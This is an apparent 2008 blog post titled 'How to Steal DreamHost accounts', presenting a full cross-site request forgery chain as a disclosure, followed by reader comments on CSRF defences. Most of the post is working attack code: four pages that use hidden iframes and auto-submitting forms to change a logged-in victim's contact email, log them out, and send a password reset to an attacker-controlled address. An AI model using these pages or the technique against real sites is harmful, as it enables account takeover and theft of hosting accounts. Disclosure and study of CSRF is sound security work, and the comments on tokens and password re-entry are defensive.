How to Steal DreamHost accounts?
I thought a lot before posting this, but in the name of full disclosures..
This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.
It will work on any dreamhost costumer that logged in to his account (Note – you must use the logout button and then it will not work on your account 🙂 ).
A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..
A short manual – how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).
So – How?
It is done by sending a link to a page you need to create and host online.
There will be 4 web pages to do 3 stages of attack:
1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).
2. automatic logoff your mark from dreamhost’s control panel.
3. request a new password to the new e-mail from dreamhost.
The first page (lets call it start.php):
1: <html>
2: <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
3: <a1>This page can not be found</a1>
4: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
5: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
6: </iframe>
7: </html>
as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.
info.php:
1: <html>
2: <body>
3: <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
4: <input type=hidden name=tab value="contact">
5: <input type=hidden name="command" value="submit_edit">
6: <tr valign=top>
7: <td id=txt align=right><b>Name:</b></td>
8: <td><select name="prefix" id=frm>
9: <option value=""></option>
10: </select>
11: <input name="first" value="somename" size="8" id=frm>
12: <input name="middle" size="1" id=frm>
13: <input name="last" value="somefamily" size="8" id=frm>
14: <select name="suffix" id=frm>
15: <option value=""></option>
16: </select>
17: </td>
18: </tr>
19: <tr valign=top>
20:
21: <td id=txt align=right><b>Address:</b></td>
22: <td><input name="street1" value="somestreet" size=30 id=frm><br>
23: <input name="street2" size=30 id=frm><br>
24: <input name="city" value="somecity" size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
25: </select>
26: </td>
27: </tr>
28: <tr valign=top>
29: <td id=txt align=right><b>Email:</b></td>
30: <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
31: </tr>
32: <tr>
33: <td id=txt align=right><b>Phone:</b></td>
34: <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
35: </tr>
36: <tr>
37: <td id=txt align=right><b>Fax:</b>*</td>
38: <td><input name="fax" size=30 id=frm></td>
39: </tr>
40: <tr>
41: <td id=txt align=right><b>IM:</b>*</td>
42: <td><input name="chat" size=30 id=frm></td>
43: </tr>
44: <tr>
45: <td id=txt align=right><b>URL:</b>*</td>
46: <td><input name="url" size=30 id=frm></td>
47: </tr>
48: <tr>
49: <td></td>
50: <td id=txt>*optional information</td>
51: </tr>
52: <tr>
53: <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
54: </tr>
55: </form>
56: <script>
57: document.asd.submit();
58: </script>
59: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
60: </body>
61: <html>
as you can see – this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php
info3.php:
1: <html>
2: <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
3: </iframe>
4: <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
5: </html>
as you can see – info3.php is doing two things:
1. logoff your mark from dreamhost control panel
2. redirect to info2.html
info2.html:
1: <html>
2: <body onload="document.getElementById('2').submit()">
3: <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
4: <input type="hidden" name="return_url" value="" />
5: <input type="hidden" name="email_pwd_submitted" value="1" />
6: <input name="email" class="text" value="somemail@somedomain.com">
7: <input type="submit" class="button" value="Email me my password!">
8: </form>
9: </body>
10: </html>
this last step is to send a forget password notice to the new email address.
that’s it – 4 pages and you can get any dreamhost account..
My name is Guy Mizrahi and I am a Security Specialist from Israel.
Go to the About page to read more about me.
June 17th, 2008 at 5:29 am
[…] http://guymizrahi.com/2008/06/14/how-to-steal-dreamhost-accounts
June 17th, 2008 at 10:20 am
well, this method isn’t new..
it is called XSRF (cross site request forgery).
I really like this sec hole cuz almost every site has it, it is very difficult to secure.
July 4th, 2008 at 1:26 pm
L[s]D – it’s not so difficult to secure that. you just need to make sure that all the user that want to make a new changes his account must type his password in the form…
July 6th, 2008 at 2:13 pm
you can also add some small text box with random password that the user need to fill.
July 8th, 2008 at 12:24 pm
I think you are all missing the point here.
It is obvious you can secure this operation (change details) in many different ways.
The point is that DreamHost didn’t think that there is a need to secure it.
That is whats bothering me.
July 10th, 2008 at 12:20 am
i think that csrf is very easy to secure one way is to create a security_token
and this is the best secure form csrf…